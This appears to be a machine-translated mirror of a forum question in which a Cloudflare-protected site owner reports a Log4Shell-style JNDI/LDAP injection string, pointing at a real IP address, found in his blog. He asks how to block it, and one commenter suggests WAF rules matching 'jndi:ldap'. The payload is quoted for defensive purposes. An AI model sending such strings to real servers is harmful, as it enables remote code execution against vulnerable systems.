网站攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}

Site attacked: ${jndi:ldap:/93.95.216.134:1389/Exploit}

提问人:Robert Benedetto 提问时间:10/5/2023 更新时间:10/5/2023 访问量:104

问:

似乎有人试图攻击我的网站。我在博客中看到以下内容受到攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}

似乎来自香港。

我的网站只是抛出 400 个错误,所以它没有造成任何伤害(似乎),但我将来如何防止这种情况发生?

该网站位于CloudFlare后面,仅供参考。

安全 Cloudflare 客户端攻击

评论

0赞 Mark B 10/8/2023
添加 Cloudflare WAF 规则以阻止以 ?或者阻止请求,如果您的网站不支持此类请求?归根结底,您将如何阻止任何特定类型的请求像这样访问您的网站?答案是在请求中找到可用于将其识别为攻击的事物,然后创建一个 Cloudflare WAF 规则来阻止包含该事物的请求。/Exploitjndi:ldap
0赞 Robert Benedetto 10/10/2023
非常感谢,会研究它(不确定如何创建这些规则),但谷歌是我的朋友)!

答: 暂无答案

上一个:从服务器端重定向浏览器

下一个:为什么客户端劫持仅在浏览器在线时有效?